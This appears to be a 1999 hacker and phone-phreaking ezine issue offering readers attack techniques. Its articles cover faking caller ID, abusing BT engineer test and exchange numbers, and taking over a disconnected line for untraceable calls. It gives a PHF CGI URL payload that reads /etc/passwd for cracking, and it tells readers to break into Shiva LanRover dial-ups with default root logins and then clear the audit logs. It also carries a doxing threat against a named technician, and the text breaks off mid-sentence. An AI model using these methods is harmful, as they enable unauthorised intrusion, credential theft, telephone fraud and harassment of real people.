yyyyyssssyyyy yyyyssssyyyy yyyy yyyy |lS$$ yy $$$$ """" yy lS$$ S$$$ S$$$$$ $$$$$ S$$$ssssyyyy :|lS$ ""yyyyy yyyyssss|lS$ lS$$ lS$$ yy$$$$$ lS$$ yy lS$$ :||lS$$ $$$$$ :|lS yy :|lS |lS$ |lS$ $$ yyyy |lS$ $$ |lS$ :::|l ,$$$$$ ::|l $$ ::|l :|lS :|lS $$ :|lS :|lS $$ :|lS ::::| $$$$$$ :::| $$ :::| ::|l ::|l $$ ::|l ::|l $$ ::|l .:::: ....... .:::....:::: .::| ..:|....:::| .::| .. .::| F41th Issue III [April 1999] D4RKCYDE tHE cOLLECT1VE darkcyde.8m.com #darkcyde EfNet. Contents: --> Editorial. By hybrid <-----Ooo--- --> CLID Faking. By TheDohBoy <-----Ooo--- --> Fone Technologies Of The New Millenium. By TheDohBoy <-----Ooo--- --> Local Exchange Phreaking. By TheDohBoy <-----Ooo--- --> How Brakis Got A Phree Fone Line. By TheDohBoy <-----Ooo--- --> Installing Linux, how to get it werking. By Bodie <-----Ooo--- --> Overview of some common exploits. By Bodie <-----Ooo--- --> The ShivaLanRover System (@ Userid:) By hybrid <-----Ooo--- --> How to be 3l337 in 10 Easy Steps. By Force <-----Ooo--- --> BT Network Tones and Announcments. By Force <-----Ooo--- --> UK Hand Scan of O8OO 919. By Force <-----Ooo--- --> The SS7 telephony protocol. By hybrid <-----Ooo--- .. .... .. " Richard, CO, how can I help you? " .. .... Hi, this is Mike up in network administration, Just calling to confirm the problem with the network maintanance on stack 82 of your router..... " Yes, the problem was fixed about 30 minutes ago, apparently there was a problem with the smps..... " Sure.. listen, we've set up a routine output port on 512 XXX XXXX, emiting 300 Hz every 12 Ms, can you check that the line is still functioning?... .. " No, it appears to be a standard line.. ... " OK Richard, we'll set another one up in about 15 minutes, in the mean time terminate the line and I'll call you back soon to confirm the stack emiter. .. " No problem, I'll reset the asp... " .. ...... .. 512 XXX XXXX... " Where' sorry, the number you have called has been disconnected, no further information is available about this number " ... ... (bye bye) ---(OOooOO)-------------------------------------------------------------(OOo- ---(OOooOO)---[supreame f41th diplomatic editor in chief]----[hybrid]---(OOo- ---(OOooOO)---["find me on the PSTN bitch"]----[th0rn@coldmail.com]-----(OOo- ---(OOooOO)---[el8 minister of foreign espionage]------------[downt1me]-(OOo- ---(OOooOO)---["..__... _ ...__.."]--[downtime@webcrunchers.com]--------(OOo- ---(OOooOO)---[crack cocaine p1mp]---------------------------[alph4vax]-(OOo- ---(OOooOO)---["i be the king of buffer overflow"]----------------------(OOo- ---(OOooOO)---[supreame master of beaste boy qoutes]---------[force]----(OOo- ---(OOooOO)---["i jumped outside with my walkman on..."]----------------(OOo- ---(OOooOO)---[bagpipe player, and hagis master]-------------[doh-boy]--(OOo- ---(OOooOO)---["bollocks"]----------------------------------------------(OOo- ---(OOooOO)-------------------------------------------------------------(OOo- ---(OOooOO)---[elf]--[tonekilla]--[mortis]--[bishopof_hell]--[zomba]----(OOo- ---(OOooOO)---[digital_fokus]--[s1nt4x]--[angel]--[mistress]--[lowtek]--(OOo- ---(OOooOO)---[digiphreak]----------[darkcyde.8m.com]-------------------(OOo- ---(OOooOO)-------------------------------------------------------------(OOo- ---(Oo)----[elite]: telnet/ftp: fedworld.gov, even more elite: ch1ckie. Yugoslavian h4x0rz & h4x-wh0r3z. Beaste boyz, blur 13. Guano Apes 'lords of the boards'.. ---(Oo)----[lame]: people who find it amusing to live out their pointless existance taking over irc channels. PLUK. mrsp00n. AT&T conf lamers. Mr Clinton of the wh0re house. Propoganda and patrioctic Bill clinton speaches, not forgeting Mr Blair. lamer still: PBX whorez who call themselves phreaks. Lame as shit: 'cooldave' ...cooldave is one of the latitude techs who maintain meetingplace confs, don't fuck with us bitch./ we got your land line number, registration plates, SS number, family medical history, we even know the brand of your fucking toothbrush. ---(OOooOO)--------Editorial--------------------------------------------(OOo- ---(OOooOO)--------by hybrid--------------------------------------------(OOo- ---(OOooOO)--------th0rn@coldmail.com-----------------------------------(OOo- f41th has finally began to take off. When we first came up with the idea of producing an ezine we nether thought we would get to issue 3, but now we intend to keep going. The idea of f41th is to create an ezine that is aimed at the American as well as UK h/p scene. f41th is not intended to be a raw information resource, but is supposed to be entertaining to read at the same time. We still need more people to submit articles for f41th, so if there is anyone out there who wishes to have an article appear in our zine, just email anything to me or any of the d4rkcyde members. I can be emailed at many address, but mainly th0rn@coldmail.com. The d4rkcyde website is still undergoing maintanance, and we hope it will be back up and running properly soon, to visit our site goto darkcyde.8m.com. The other day someone called f41th a 'wanna-be' zine. I'd like to say we are not trying to be like anyone, we are just producing a zine that is usefull to both UK and US audiences. Apart from that comment, we have had quite alot of good feedback from various people, I'd like to say werd to everyone who has commented on the zine with a more positive flavour. Anyways, that's my short editorial over, hope you enjoy f41th 3, WERD. ---(OOooOO)--------cLID Faking------------------------------------------(OOo- ---(OOooOO)--------by TheDohBoy-----------------------------------------(OOo- ---(OOooOO)-------------------------------------------------------------(OOo- OK, in this article I'm going to cover the basics of CLID (Calling Line IDentification) and how it affects the humble phreak. CLID Is Different From ANI!!! A lot of people get confused about the difference between these. ANI is an age old ID method whih is only accessible by your local exchange. Its basically a test of voltage levels in your local loop to see "who's making a call right now" As you can see, anyone outside your exchange has to "trace" the path of the call through a maze of trunk lines. For the local exchange, the loops are grouped into "pools" of certain numbers. So say your number was 123456, well for a start your lucky to have such a memorable number!, but how does the exchange work out your number. Well the main "pool" you are a part of is the 1 pool. This consists of all numbers beginning with 1 in the exchange. This then splits off to other sub-pools, like 10, 11, 12. So after going through six sub-pools your unique number is reached. This is how 175 works for reading out your number (on System X) So if you dial 141 then 175 it will have no effect. CLID is digital information (derived from ANI intially) which is sent from exchange to exchange, and occasionally on to subscribers with the CLID service. This can be withheld by dialling 141 in the UK, or by using star services in the US. 17070 works using this. How can I stop ANI going out on normal calls? Well the method of diverting (just getting an op to connect you to the number) gets rid of both ANI and CLID. The ANI dis-appears completely, and the CLID is what is known as the generic paket. No info about you can be given from this packet. ANI and call logging. Call logging is done at your exchange and this shows all numbers you have dialled. So even if you dial 141 before dialling you can get snared by the caller log. Diverting only shows that you have made an operator call, and loads of people are dialling the op at once, so this is s good solution to that problem. OK, I can get rid of all my ANI/CLID/Caller Log info, but can I fake my CLID so that I look like somenone else? The good news is that you can with a little knowledge of CLID protocols, and maybe some programming knowledge. What you need is a program that can transmit given CLID information to CLID Units (the ones that show residential/business customers the number before they pick up) How these units work is that they listen on the line for a warning tone from the exchange, and then a modem recieves the CLID info before the fone rings. All this takes place in a fraction of a second. So all that is required is such a program. And the following method: 1) Divert through an op to call the number you wish (or dial 141 at least) 2) Wait for pick up, and when they go off hook, send the CLID packet 3) Do what you want How this looks at their end is as follows: 1) Fone rings and CLID unit says "Operator call" or "Number withheld". They then pick up the reciever (and possibly hear a "cheep") 2) The unit then says the fake number on its screen. This is perfect for 0800 numbers, because they have CLID units. Its also good for ISP's, and even certain telephone companies!! What won't be fooled is 1471, but if you've done it right then there will be no number there. Thats all I can think of now, maybe we'll see a good proggie spring up to help us soon! ---(OOooOO)--------Phone Technologys of the new millenium---------------(OOo- ---(OOooOO)--------by TheDohBoy-----------------------------------------(OOo- ---(OOooOO)-------------------------------------------------------------(OOo- Pretty snappy title huh.. Well In this article I hope to focus on technologies which are yet to make their way to the end user. I'll be taking the point of view of a phreaker who wants to know the possible loopholes of the taechnologies. Wavelength Division Multiplexing. A really great technology which could cut the cost of calling pretty much 100%. Everyday multiplexing is done using the TDM (Time Division Multiplexing) technique. This technique allows Multiple subscriber to subscriber calls to utilise the same trunk lines. An illustartion to show how this works follows: Call 1: (First in line) ------------ - Call 2: (second in line)-------------------Single trunk line holding *1* call at any time - Call 3: (Third in line)------------- Realistically the line numbers would not have a one to one correspondence with their order in the queue.This would be allocated using an algorithm stored on switching equipment. The usage of the network is never 100% and so the loss in quality of the calls is *very* minimal. As one can see this method will have its problems. There is an upper bound on the call capacity set by the sampling rate of the sound levels at the subscribers fone and the number of subscribers using the line at any one time. The upper limit varies directly (assuming that the number of callers at the peak is roughly constant) as the sampling rate. One way to overcome this is to use seperate wavelengths for seperate calls (or TDM lines). This means that each WDM line can carry a multiple of the equivalent TDM lines. This means the cost to the end user should vary directly as the cost of TDM and inversely as the equivalent number of TDM lines per WDM line. Local calls (in the UK) are already 1p per minute for a standard line so even a small WDM/TDM ratio could see calls becoming *extremely* cheap. The fone will become just another utility which can be left on all day (much as electricity is now). There are two main pitfalls which I can think of about this technology. Firstly there is the problem of interference from other calls. This effect will be much the same as radio interference causing call quality to drop. A possible solution would be to allocate wavelengths based on prime numbers. These would not be harmonics of any other signal in the wire, stopping interference almost completely. Phases can be allocated randomly also to prevent interference. Another is the limited spectrum available. Due to the photo electric effect most of the signals will have to be sent (along fibre optic cable) at a wavelength particular to the materials used in the detectors. If digitally encoded, the transfer rate (although HUGE) will be limited by the switching times of the semiconductor equipment at the other end. An advantage for the telcos is that conference call facilities can be made just by "tuning" three calls into one wavelength on a specific line. No doubt this could be taken advantage of to listen on others conversation or step up trunks e.t.c. I would expect also that inter-office signalling would travel on the same lines as consumer calls. Perhaps if telcos are thick enough to put them at the lower end (where the density of calls is greater) these can be "tapped" by phreaks. I think that covers most of what phreaks need to know about WDM. Telefony Over The National Grid. Another high bandwidth technology (which may even incorporate the above system) which can see the cost of calling drop. I doubt this will ever get off the ground personally. BT/AT+T will see their profits at risk and will try anything to stop this technology taking hold. Basically how this works is to sned signals over the electric distribution system. A pretty good idea, especially as the system can provide high bandwidth on a system already present in peoples homes. One obvious advantage to telcos invoived would be that it would stop beige boxers :> (clip clip, ring ring, fry fry!!!!) Up to subscriber level the system is bound to be similar to the structure of the PSTN system, i.e. sub-units acting as exchanges e.t.c. It will look quite similar to the normal fone network. IP Telefony. Notable in that its already in existence. To check out a good example go to www.net2phone.com and download the software. That gives you 1-800 access and a complimentary bundle of minutes. This is the use of the internet to conduct voice telefony. It can be thought of as a gateway between the internet and the PSTN (although some applications of this only go net-net) This makes calling intenational as cheap as a local call to your ISP so that cant be bad. Things like NetMeeting and Netscape Conference/Cooltalk are already in use and are free to use. BT already feels threatened and is ploughing alot of money into this technology in order to save it market share. As for call quality I think its about as good as a digital mobile driving down the M1 at 100mph in that the volume varies considerably. This is due to the packet technology in use on the net. Good news for hackers is that the servers can probably be hacked and used to route calls through. Also, AT+T are providing an IP Conference call system (Free for ten minutes during the Superbowl) This will allow you to put in numbers, and then call them all at once using your computer. Check around on the net for such things, they are growing steadily! Videoconferencing. Aaaahh.....Takes me back to when I was at a BT exhibition in 96/97 when they had their videofones on display. Of course they had two set up to allow two people to talk on them. What they forgot was that if you hung up you could dial out on them. So if BT can be that stupid well who knows! nyhoo back to videofones. Businesses are increasingly using these as it provides an ideal solution to the problems of teleconferencing. i.e. talking over someone else. No doubt as the service expands in bandwidth perhaps TV and the net may integrate into this service, providing a one stop comms shop as it were. No doubt BT would charge a premium for this kind of thing!!! GPS Cellfones Dangerous technology for the phreaker if this becomes defacto. Think of the ability of an operator being able to trace not only your number but *exactly* where you are!!! Very bad stuff. Free Local Calls In The UK Finally in 2000 (approx. when OFTEL takes the restrictions from BT) we can take a leaf from the book of our American phriends and learn how to step up trunks and so on. Local PBX hacking will become normal and the appeal of Meridian Systems may wane slightly. Perhaps a way can be found to busy out certain routes and make the switching systems hand you off up the trunk, a few key presses later and you can make a free call anywhere!!! The weak link there is trying to block certain paths through the system. I'm looking forward to this (he says rubbing his hands together) ---(OOooOO)--------Local eXchange Phreaking-----------------------------(OOo- ---(OOooOO)--------by TheDohBoy-----------------------------------------(OOo- ---(OOooOO)-------------------------------------------------------------(OOo- Engineer Line Testing --------------------- This is info I stole from a guide sheet for BT Engineers. It basically gives them a list of numbers which they can use for testing lines/recording line activity e.t.c. This can come in useful for the phreak intent on controlling certain aspects of someones line. Some of this may have been covered in other artices, but I think the stuff on ASU's is relatively new. Testing On System X ------------------- Subscriber Automatic Line Test (SALT) 175 - Voice read out of number, follow prompts 01 Dial test 02 Power down line (shuts line down for 3 min. also wipes ANI) 6 Partial recall 7 Full recall, returns adiministrative DT 06 Power down exchange (I've never seen it happen btw!) No response - New DT Cable Pair Identification 176 Followed by Full area code and number of line on which tone is placed. Should get NU Tone, this means succesful placing of tone on on line. Testing On System Y ------------------- Subscriber Automatic Line Test 175 - Fast engaged tone/interrupted dial tone Commands same as System X BT Linetest Facility This is a doosie of a number, it was covered in last months issue of SWAT so I am technically repeating this but........ 17070 - Read out number (if no CLI no readout) 1 For ringback, 2 for quiet line, 3 for fasttest, 4 for fasttrans, or clear down. 1 Rings back upon clear down 2 Gives quiet line for testing LN 3 Gives ring back line test, Line test, Cable Pair Identification e.t.c. 4 Recodring of test results Clear Down = Hang Up ASU's ----- OK so your asking what the hell an ASU is. Its basically the main control point for that local area code. Not all exchanges keep these in the range I am specifying but do some scanning and you should find them. ASU's allow switching engineers to control the main features of the switch from a remote fone. I don't have to spell out what this means for the phreak. ASU's in most exchanges are found at 9999 They should present you with a message requesting a pin. You may need to sleep with a BT employee to get one of these. You could war dial one, but for gods sake NOT FROM YOUR HOME FONE. Once inside you can check the volume of calls coming through the exchange, perform house cleaning tasks on the switch, mess around with lines. You name it. Hack one of these and you will become 31337. An interesting point I might like to make about these numbers is that they automatically step you up to or STD level. This means if you dial your local ASU you will be stepped up to National level. Find a break signal like on 175 (after ring back flash hook) then you can mess around on national lines for local rates. Fiddles ------- These are fixes put in the circuit by fraudulent engineers wishing to exploit their position. They hide these in the 17x range and they are unique to each exchange. There are only 10 numbers to look through. They are usually hidden behind NU tones or "sorry........" messages. Mess around on each number till you find a fiddle. You should be able to make free calls off these, or possibly access looped lines. Either way, corruption in a powerful organisation is inevtiable, ABUSE IT. If you find a fiddle and want to use it outwith your own exchange your going to have to either find a PBX in your area in the 0800 range or hook a black/beige/gold box combo and dial through that. CSS's ----- The Holy Grail of numbers. If you find this you will become more 'leet than Captain Crunch, Whistlin' Joe, Onkel Deitmeyer, and Alexander Graham Bell put together. You can do SHIT LOADS with this number. You can even check up on line records of any number in that area and see the caller log. There are dial ups on PSTN and over the net through a special BT server. I also believe there are dial ups on PSS/Featurenet. To find a CSS you may have to know a BT employee or if you don't it'll take LOADS of scanning, hacking, and heart attacks over your local exchange. Scanning in your local prefix is always a good bet. Exchange Dial Ups ----------------- Your local exchange WILL have a modem dial up on PSTN or PSS/Featurenet. Once you have found this you can access fun things. Tracing calls is rather easy from these. Changing Line status and so on is also easy. Weeuurd Stuff!!! ---------------- I found a severely weird number on a 373 scan I did myself. Its 0800373983. Its exactly the same as 17070!!! Whats weird is that I can dial it from non- BT fones (including my Orange JustTalk) and use it to test lines (great for bieging) It'll probably die now that its in the Public Domain but hey! why not share. Wrap up ------- Thats all I know on the subject of local exchange phreaking at the moment. ---(OOooOO)--------How Brakis got a free fone line----------------------(OOo- ---(OOooOO)--------by TheDohBoy-----------------------------------------(OOo- ---(OOooOO)-------------------------------------------------------------(OOo- What is documented here is the result of a group of four phreaks fucking about with mates fone line. The techniques enclosed are not only accessible to the 'leet, anyone can use them. Basically, this is how we got Brakis a phree, untracable fone line. Brakis *used* to be with BT but hated them so much that he moved to a competitor (No names mentioned) Naturally when he switched BT came and took his fone line off. I might mention of course that he did have two BT lines, and now has one (legit) BT line which is a business line. Well when we started off we were on the jolly side of drunk and had the idea of Beiging Brakis' old line. ODC had the great idea of checking the line length using 17070. He did this from my Orange Mot. c520 (I have a 17070 dialup, I aint making it public, mail me if you want it) The test came back and the line length was 2.4km. This was odd because the distance from Brakis' house to the local BT Xchange was about 2.4km!!! So ODC reckoned that the line was terminated INSIDE BRAKIS' HOUSE!!! After fixing the second line after we screwed it up a bit, we hooked our Bieges onto the terminated wire pair. THERE WAS A DIAL TONE!!! We tried dialling a few 0800's but got nowhere, then we dialled 100 and got thro! ugh!!! We could get the op to connect us to wherever we wanted. We then called it on the cellfone to check to see if it could get a call back trace. We got: "Sorry, the number you have dialled is not available" There was no CLI on the line, it couldn't ghet traced, and it was FREE. Its the perfect line!!! You can follow more or less what we done for yourself if you want a foneline for phree. Just use 17070 to test your old lines, if BT were as stupid as they were in our case, you can get yourself a line. Cheers!!! ---(OOooOO)--------Linux, how to get it werking-------------------------(OOo- ---(OOooOO)--------by Bodie---------------------------------------------(OOo- ---(OOooOO)--------bodi3@usa.net----------------------------------------(OOo- I don't care what anyone says, you can't be a hacker unless you have some form of unix on your machine, how are ya gunna do anything with the iron grip of windoze on your computer?. This file will describe how to get linux on your machine and get up and running. Most people now want to dual boot with both windows and linux on their system, this is what i use, because no matter what people say there are programs that can only be run in windoze and some of these can be extreemly useful. If you want to do this, take my advise and ignore all the windows documention, you need to install windows first and then install linux on top of that. The reason for this is that windows doesn't play well with others (it doesn't really play well with anything else full stop, but thats another story) ************** *****NOTE***** Installations of linux vary widely in their setup procedure, make sure you read the manual first if you have any problems. If that doesn't solve it, feel free to mail me and i'll see what i can do to help ************** After you have done this you will need a copy of partition magic, I think this is shareware now but if you can't find a copy, mail me and i'll get one to ya. Once you have partition magic installed, you will need to set 2 partitions for linux, one will be a swap partition - and the other will be the main linux partition. Many people have different opinions about how big the swap partition should be, but i have one about 100Mb and that does me fine. The main partition should be as large as you can make it. The important thing at this stage is to leave both partitions unformatted. Partition magic doesn't currenty have support for linux partitions and you will be able to format it later during the installation of linux. The next thing you will need to do is to make a boot disk, if you bought a copy of linux it is likely that boot disks came with it, if you got a copied version or got it any other way, you won't have a boot disk. Creating a boot disk is different on each version of linux, normally there will be a utility that you can access from windows or dos that will allow you to create one easily (look under the directory /dosutils or something similarly named, if you have any problems mail me and i'll see what i can do). Once you have done this you will need to reboot the machine with the boot disk in the drive (make sure you have floppy booting enabled in the BIOS else this won't work) and the linux CD in the drive. You will now boot into linux. ************** **IMPORTANT*** Make sure you have the full spec of all your hardware with you at this point ************** This is where each different version of linux has a different installation procedure. I have installed Slackware, Red hat and SuSE and they have all had wildly different user interfaces for the installation procedure. Basicly all you have to do at this stage is tell the system what partitions you have on your hard drive, what swap partitions you have made and which partition will be used as the main partition for linux, then it will format both the swap drives and main drive for the linux file system. You can also access DOS drives from linux (something which is not easy to do in windoze) you just have to tell linux where to find the partitions. ************** *****NOTE***** The hard drive lableing is very different thant he lableing used in windows. All linux devices are contained within a directory called '/dev'. The First partition on the primary hard drive is labled '/dev/hda1'. The second partition is labled '/dev/hda2' and so on. If you have a second hard drive it is labled '/dev/hdb'. This may seem strange to anyone who has been using DOS, but it means that linux system may run under what is called a single root system. This means that there is 1 top level directory called '/' and all the directories are below that. Hard drives can be access by mounting them in a directory. This creates a link between the device in /dev and the directory the drive is mounted in. You must specify a directory where they will be mounted at install time, then accessing a seperate dirve will be just like accessing another directory. ************** Next you will probably see a list of programs that you can install if you want to. What you want to install is up to you but you may want to install a lot of programming tools so you can install other packages that may requre libraries that are contained in these packages. Next just sit back, make a cup of tea and watch it install. Reboot and you've got a linux system up and running....Congratulations :) Once you have done this take a look around the file systems, try out some commands. Some of the main command in linux are: cd - same as DOS, change directory mv - Move a file (as there is no rename command in linux, this serves as a good alternative) cp - Copys a file ls - Lists the contents of a directory (similar to dir in DOS) more - This basicly prints out any imput it gets, a very useful program crypt - This is possibly the most useful program in unix, it encrypts files so even the sysadmin can't read them, any sensitive information on a foreign system or even your own system should be encrypted I could spend my whole life explaining all the various commands available, but i'm not gunna do that, 'cus you can look that u in a book if you want to use them. One more interesting feature of linux is input redirection. This allows you to pipe input from one program directly to another. One of the most common examples of this is: ls | more This uses the '|' charictor to redirect output from the ls program to more. This is often used when there is a long directory listing, ls displays the output so fast that no one could read it, but more allows you to read output one screen at a time. The other input redirection charictors are '>' which allows you to write the output to a new file, and '>>' which allows you to add the output to the end of a file that already exists. As i said earlier, the file system in linux is very different from the windows file system. A simplified version of the file system is shown here: / (ROOT) | ------------------------- | | | | /bin /users /etc /dev | | | | ... ... ... ... There may be many other directorys as well, but these are the main ones. The '/bin' directory contains all the executable programs that are available to users of the system. Sometimes a link to another location is put in here so the file is executable from the /bin directory, but it is stored somewhere else on the system. Sometimes programs are also stored in the '/usr/' directory. The '/users' directory is used for storing user areas. This is where individual users store all their files (unless you need to be using the root account it is a good idea to use a normal user account to avoid accedental damage to files or, if you are on the net, it allows another hacker to more easily hack your system). The '/etc' directory is where all the config files are stored for the system. This directory contains the passwd file (and in some cases, the shadow file) It stores files that the system calls as variables for various programs. The '/dev' directory is the place where all the devices that the system uses is stored. This includes the mouse, keyboard, hard drives and lots of other things, the basic idea is that when a device wants to input anything into the computer, it puts the data in these files, then the system captures this data and uses it. When data has to be outputted to a device, it is put in one of these files and then is sent by the system to the device. This may seen a complex way of doing things, but in actual fact, it makes it a lot easyer for programmers to perform operations on various devices, as they only have to access a file rather than a device. (if ya don't understand this bit it isn't important for the moment) There may be several other directories under the root, but these are the main one's that you will have to wory about for the moment. The next thing you will have to do is set up X-Windows, this is a graphical interface for linux. The thing about X is that there are many dufferent versions of the desktop enviroment, unlike windoze where you just have the standard enviroment. This is good because you can decide on the style that suits you best. Personally I prefer KDE at the moment but there are different one's coming out all the time. to set up X you will need to have the full specs on your monitor and video card ready. There are 2 ways to set up X, one is a graphical way, that is quick and easy, but may not work in some cases (i had hell with this). To run this, at the command line type: XF86Setup Or to run a command line setup interface type xf86config You will then be presented with the usual menus that ask you about your hardware. Get that up and running and you SHOULD have a decent working version of X. A lot of things can go wrong here though, most people have problems of some sort. The best thing to do, if you do have a problem is to go back to the config programs and make sure you had the right specs for your hardware. Failing that you could try editing the '/etc/XF86Config' file. Although doing this is quite complicated and i would suggest reading up on how to do it first (or just wing it like most people :) ) Now you should have a fully working linux system installed, well done. There is a lot more that i haven't mentioned in this file and the chances are you will have to read lots of other files to get various things working or learn about other programs. Linux is an amazing thing if you make the most of it and ask what it can do rather than what it can't do. Welcome to the new world ---------- Greetz Anyone who can get me a pre-release copy of star wars: I'll pay any money - pleez the usual bunch of people who know i appreciate them :) ---(OOooOO)--------Overview of common Exploits--------------------------(OOo- ---(OOooOO)--------by Bodie---------------------------------------------(OOo- ---(OOooOO)--------bodi3@usa.net----------------------------------------(OOo- This file is a basic explanation of some of the methods of exploiting systems, it is not a full list, there are many exploits and to list them all would take a up my whole hard disk, but these are the most common. 1) PHF Largh if you like but it's supprising to see how often this still works. Although the number of systems vulnerable is very small now and getting smaller by the day it still saves a lot of time over some of the other exploits. This exploit is even useable by windoze script kiddies. It works because of a bug in a commonly used CGI script called PHF, this allows any remote user to see any file on the system and even execute commands :) To use it open up a web browser (If you wanna be really 31337, you can telnet to port 80, but why make life hard for yourself) go to : http://www.vulnerable.com/cgi-bin/phf?Qalias=x%0a[command] where [command] is the command you want to execute. A command you can execute is: http://www.vulnerable.com/cgi-bin/phf?Qalias=x%0acat%20/etc/passwd This will execute the command: cat /etc/passwd the %20 is used because it is the ascii charictor for space and you can't use a space in the script. This command will give you the password file and then you can start using your faverite cracker to get the passwords :) Other CGI Exploits PHF is just one example of a CGI exploit. The CGI (Common Gateway Interface) is a system that allows people to interact with web pages. They are used in signup processes, games or almost anything on the web. PHF is an example of a vulnerability in a CGI program but there are many others. the best known of these is the test-cgi exploit. This allows you to veiw the contents of any directory, although this doesn't automaticly allow you to get root access on the system it will allow you to gather usernames of users on the system. This will sometimes show up any default accounts on the system 2)Buffer Overflow Exploits There are too many of these to name each of them but they all work on the same principal. Examples of these would include statd, qpop and many more. Each program can store data in an area of memory called the stack. This stores data from each routine that a program calls. in a program like this (a little programming knowledge is needed) #include stdio.h void hello() { printf("hello"); } void main() { hello() printf("now f**k off") } This is a very simple program which calls a routine hello() to print "hello" to the screen (I would've used "hello world" but i couldn't spell world :)), when the procedure hello is called, any data from the main program is put onto the stack. In this program there is no data that has to be stored, but it still has to store the location in the program so when it finishes running the procedure hello() it can knows where is got to in the program and prints "now f**k off" next. To enable the program to do this a return address of the next instruction is also stored on the stack. Helpfully, the buffer is arranged like this: _______ |return | |address| |_______| | | | Data | |_______| This means that the data is put on the stack in a nice convenient position, right next to the return address. The data area is allocated as the total space allocated to all the variables that have to be put on the stack, in out little program earlier there was no need to store any variables as there were none, but most programs will have variables that they need to store on the stack. How do ya exploit this? Look here: void ouch(char *ot) { char hitme[10]; strcpy(hitme,ot); } void main() { char hehe[100]; int hmm; for(i = 0; i < 10; i++) hehe[i] = 'A'; ouch(hehe) } Now, here's where it gets a bit more exciting. First the string, 'hehe' is filled with a long list of 'A's, this makes sure that the string is full. Then the function 'ouch' copies the string 'ot' into the string 'hitme', in this function, 'ot' refers to the string 'hehe' in the main body of the program. 'hitme' is 10 charictors long and so is allocated 10 bytes, but if we copt 'hehe', which is 100 bytes long into 'hitme' we won't have enough space. Unfortunately the function we use to copy these 2 strings, strcpy, doesn't check the length of the strings before it copies them. This means that the contents of the string 'hitme' is bigger than the space allocated to it. This causes the string to overrun into other memory areas like this ______________ | | | | Space allocated |--------------|<------- Actual end of data area, due to for return ---->| | large size of 'hitme' address |______________|<--------End of space allocated to data area | | Space allocated | | for data area ->| | | | |______________| This means that some of the data area will be taken as the return address. In our program, the return address will be filled bit a line of 'A's, this won't be a real address in the computers memory so it will obviously bomb out with an error. This type of error can be caused deliberately on some commercial programs and, more interestingly, unix security programs. This means we can manipulate the return address of the program to go to anywhere in the computers memory. The most common way of exploiting this is to place code into the data area of the buffer and have the return address point back to that point in the buffer, this means we can insert our own code into the program. This opens up the system to all sorts of wonderful effects :) This was not a total explanation of buffer overflows, for more information get phrack issue 49-14 But if ya names so1o ya don't need to bother with this, just type: exploit [vulnerable host] but this is written for any real hacker who wants to know what goes on behing the code. More to come, but this file just gives ya a general feel for the exploits. 3) Wingates Wingates have become very popular amongst hackers recently, they allow you to bounce a connection from any site running one of these, a wingate is basicly a proxy server that allows you to send all your connections through that host. Unsupprisingly because of the obvious security holes (and maybe because of the name :)) a wingate can only be run on a windoze server or even just a home box can run a wingate. A wingate was initialy built for a small windoze network to access the net over one line without all the hassle of setting up all the network software. In other words, it's another microshaft security hole, something we've seen a lot of in the last few years. Basicly all ya have to do is find a computer with a wingate running and connect to it, then you can safely hack away :) 4) Exports Some nice servers actually let you view almost any file on their system by allowing their whole system to be mounted onto any foreign host. This is extreemly kewl because it means that, if you are logged on as root on your system it will mean that you have root priviliges on the remote system. This exploit also works in windows, that is why you should never allow any of your directories to be shared when you are on the net unless you don't mind loseing the data in the directories and it doesn't contain any confidential stuff or (as wth an unnamed person) your entire dox, thats just stupid -------------- More to come, this will give ya a general feel for the exploits but i'll explain them in more detail in other files - just to keep ya coming back greetz: Hybrid: Genrally kewl geezer who nicks my modem :) The old bloke who turns up in Mcdonalds at 2600 meets: One of the wierdest people in the world (Just beat me to it) Pro plus: keeping me awake during all those long hacking nights The US military: Supplying all my shells 9x: supplying t-files so that everyone can copy them ---(OOooOO)--------Hacking the Shiva-LAN-Rover System-------------------(OOo- ---(OOooOO)--------by hybrid--------------------------------------------(OOo- ---(OOooOO)--------th0rn@coldmail.com-----------------------------------(OOo- ************************************************** * Disclaimer: * * * * The information provided in this text file * * has been obtained from public domain resources * * and is intended for educational use only. * * * ************************************************** Contents: 1. Introduction 2. What can Shiva lan rovers do? 3. The command line 4. System security 5. PPP 1. Introduction Shiva systems are becoming increasingly popular in the LAN networking world. If like me you have done quite alot of scanning you would have come accross a login prompt similar to this: [@ Userid:] If you have never seen this before, take a look at some of the 9x scans at www2.dope.org/9x. In this file I am going to fokus on the security strengths and weaknesses of the ShivaLanRover networking system, and give a general overview of what can be done with such systems. The Shiva system is a network security problem in it's own right, in the sense that once you have gained access to one of these platforms, you have the opotunity to explore the entire network on which the system is based, in essance, you are on the trusted side of the firewall. If you would like a copy of the ShivaLanRover software just FTP to ftp.shiva.com or get it via the WWW. To find a Shiva, the first thing you should do is dust off that old wardialer program, and start scanning local or toll-free prefix assignments, if you can't do this, you suck, go away. You will know when you have found a Shiva when you are confronted with the following prompt: @ Userid: or if Radius authentification is enabled: Starting Radius Authentification.... @ Userid: Blah, ignore the radius authentification thing for now, it's just a lame attempt to make the system look as if it has been secured, in most cases the sysamin would have missconfigured the authentification and you will be supprised as to how easy it is to get in. So you are at the login prompt, what next? - As in most OS's Shivas have a nice set of default logins, so the sysadmins poor setup is your gain. Try this: login: pass: . The root login will work 9 times out of 10. The reason that the root account works alot is beacuse in some cases the admin is not even aware the account even exists! Most of the system setup is done via the main terminal, so the admin does'nt have to login. the root account is not listed in the userfile database, so most admin's overlook it. In some cases the admin would have set up there own acount with somthing like but if the admin has any common sense you will not get in with that. Like most OS's, Shiva systems have an audit log, so don't sit there trying to brute force anything, once you are in, you can clear the system log, but more on that later. OK, you've found a Shiva, you've loged on as , now what? - read on. Once loged in, you will be droped into the Shiva command line prompt, which should look somthing like this: Shiva LanRover/8E, Patch 4.5.4p6 98/06/09 (Version and type of Shiva) ShivaLanRover/8E# (The command prompt. Can be configured to say anything) To get a list of the available commands type or this will reveal a menu similar to this: ShivaLanRover/8E# ? alert Send text alert to all dial-in users busy-out line Busy-out serial line modem clear Reset part of the system comment Enter a comment into the log configure Enter a configuration session connect Connect to a shared serial port crashdump Write crashblock to log disable Disable privileges help List of available commands initialize Reinitialize part of the system lan-to-lan Manage LAN-to-LAN connections passwd Change password ping Send ICMP echo to IP host ppp Start a PPP session quit Quit from shell reboot Schedule reboot show Information commands, type "show ?" for list slip Start a SLIP session telnet Start a Telnet session testline Test a line The first thing you should do is check to see who is online, at the # prompt use the show command to reveal the list of current online users: ShivaLanRover/8E# show users Line User Activity Idle/Limit Up/Limit 1 jsmith PPP 0/ 10 0/ None 2 root shell 0/ 10 0/ None Total users: 2 So here we see ourselves loged in on line 2, and a PPP user on line 1. Note 